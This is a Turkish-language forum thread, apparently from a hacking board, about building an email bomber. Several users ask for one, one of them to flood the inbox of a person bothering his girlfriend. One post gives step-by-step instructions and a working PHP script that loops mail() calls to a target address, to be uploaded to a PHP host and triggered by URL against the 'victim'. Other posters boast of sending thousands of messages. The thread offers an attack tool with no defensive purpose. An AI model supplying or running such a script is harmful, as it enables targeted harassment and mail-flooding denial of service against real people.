MaiL BomBeR YapiN ;) [ ResimLi ]

pharoh attık pmye ama baktıın yok mu ne:D

ya kardeşim ben bunu yapamadım yeniyim bu işlerde biri kız arkadaşımı rahatsız ediyor mailini bombalamam lazım bana link yapıp vere bilirmisin sana zahmet ya şimdiden tşk ler

Cino Kardesh narod ru php yi desteklemiyor..
kardesh ben mailbomberi yapdim amma sayfayi achinca gitti gitti gitti...... yaziyor

arkadasım paylaşımın için çok tesekür ederim.çok aradım ama anlatımlı bir bomber programı bulamadım anlatımlı bir bomber linki eklersen çok sevinecem şimdiden emegin için çok tesekür ederim başarılarının devamını dilerim..

daha açıklayıcı olsan herkes oğrense kardeş

:mad: herkesin anliyacağı dilden resim anlatımlı anlatsanız nesıl olur

"Azeri" qardash heqiqetende gedirmi? bu1,.. Mende Mail Bomber var bu saytda Menim Movzularimi oxu Denyo ile nece mail bombalanacaq yazmisham,.. dayanmadan Neche dene deyirsen bombalayir,... 3000,5000,10000 ve davam :) egen inanmirsan onda mailini ver stanokdan kechirdim,.

teşekkürler kardeş ellerine sağlık

Bakın Arkadaşlar ben yaptım kendime denedim hatta salaklık yaptık 100 tane toplam gönderdim kendime yapamayan arkadaşlar için bende tekrar resimli olarak anlatıyorum.

Yukardaki resimde ilk önce bir not defteri açıyoruz ve aşağıdaki kodu yapıştırı[email protected] yazan yeri göndermek istediğiniz kişinin mail adresini yazıyorsunuz. Toplan yazan yere kaç tane yollamak istiyorsanız 100-200 v.s yazıp bomber.php olarak kaydedin.
Not: isteyen şu kısımdaki yazıyıda değiştirebilir "mesajınızfgagawgawgawgawgag"

<?
$mailto = "[email protected]"; $subject = " konu "; $Headers = "From: mesajınızfgagawgawgawgawgag "; $toplam=100; for ($t=1;$t<$toplam;$t++){ if (mail($mailto,$subject,"toplam: $toplam / $t Mail.",$headers)) echo "Gitti"; else echo "Gitmedi"; }
?>

Bu resimdede nasıl kaydedeceğinizi gösterdim.

Artık kaydettikden sonra yapmanız gerek tek şey bomber.php dosyasını PHP destekleyen bir ftp sunucusuna yollamanız ve vereceğiniz linke tıklamak kalıyor.

Ör: http://www.xxxxxx.com/bomber.php bu şekilde internet explorer adres cubuğuna yazdıgınızda enter diyin ve kurbanı mail manyağı yapın. Saygılar.

Not: Lütfen anlamadım demeyin artık. :( :(

:alkol:​

Bu arada arkadaşım çok teşekkürler paylaşımın için eyw. Yukarda tekrar anlatırken sana teşekkürü unuttum. sory.

mailini bombalamak istediğin kişiye normal bi şekilde mailini yazıyosun sonra gönder 'SEND' diyosun saniyede bi defa basıyosun her bastıgında bi mail olarak iletilecektir

Geri